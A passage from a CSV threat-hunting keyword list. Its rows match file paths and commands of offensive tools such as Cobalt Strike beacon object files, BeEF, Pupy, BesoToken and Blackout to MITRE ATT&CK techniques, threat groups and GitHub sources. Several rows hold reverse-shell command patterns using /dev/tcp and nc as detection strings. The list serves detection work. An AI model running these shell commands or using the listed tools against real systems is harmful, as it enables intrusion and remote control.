T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" +"*/beacon-object-file*","offensive_tool_keyword","cobaltstrike","Cobaltstrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/realoriginal/beacon-object-file","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/BeaconTool.java*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/beef.git*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beef/extensions/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beef_bind_shell/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beef_common.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beefbind/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/beefproject/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/Ben0xA/*","offensive_tool_keyword","Github Username","Github username of known powershell offensive modules and scripts","T1059 - T1027 - T1064 - T1086 - T1191 - T1202","TA0002 - TA0003 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Ben0xA","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/BeRoot.git*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*/beRoot.py*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*/beroot.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/BesoToken.cpp*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*/BesoToken.exe*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*/BesoToken.git*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*/bettercap*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network 
Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/bh_owned.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/bhqc.py -*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","0","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" +"*/BIFFRecordEncryption.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*/bin/0d1n*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/bin/AceLdr*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*/bin/fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - 
TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" +"*/bin/gorsair *","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","0","N/A","N/A","9","825","74","2023-09-09T13:18:33Z","2018-08-02T16:49:14Z" +"*/bin/hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*/bin/nxcdb*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/bin/posh*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*/bin/pupysh*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/bin/read_i.php?a1=step2-down-b&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/bin/read_i.php?a1=step2-down-c&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/bin/read_i.php?a1=step2-down-j&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation 
tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/bin/read_i.php?a1=step2-down-k&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/bin/read_i.php?a1=step2-down-r&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/bin/read_i.php?a1=step2-down-u&a2=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*/bin/sh | nc*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*/bin/sh -i <&3 >&3 
2>&3*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*/bin/Sleeper.o*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*/bin/unshackle*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" 
+"*/bin/wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*/bind_powershell.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/bin-sploits/*.zip*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/BITB.git*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*/BITB-main*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*/bitcoin-getaddr.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/bitcoin-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/bitcoinrpc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/bitsadmin/bitsadmin.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/BitsArbitraryFileMove*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/bittorrent-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/bjnp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Blackout.cpp*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*/Blackout.exe*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*/Blackout.git*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*/Blackout.sln*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" 
+"*/Blackout.sys*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*/blindeventlog.exe*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" +"*/blob/main/write_anything.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z" +"*/BlockEtw.git*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" +"*/BlockOpenHandle.git*","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","149","21","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" 
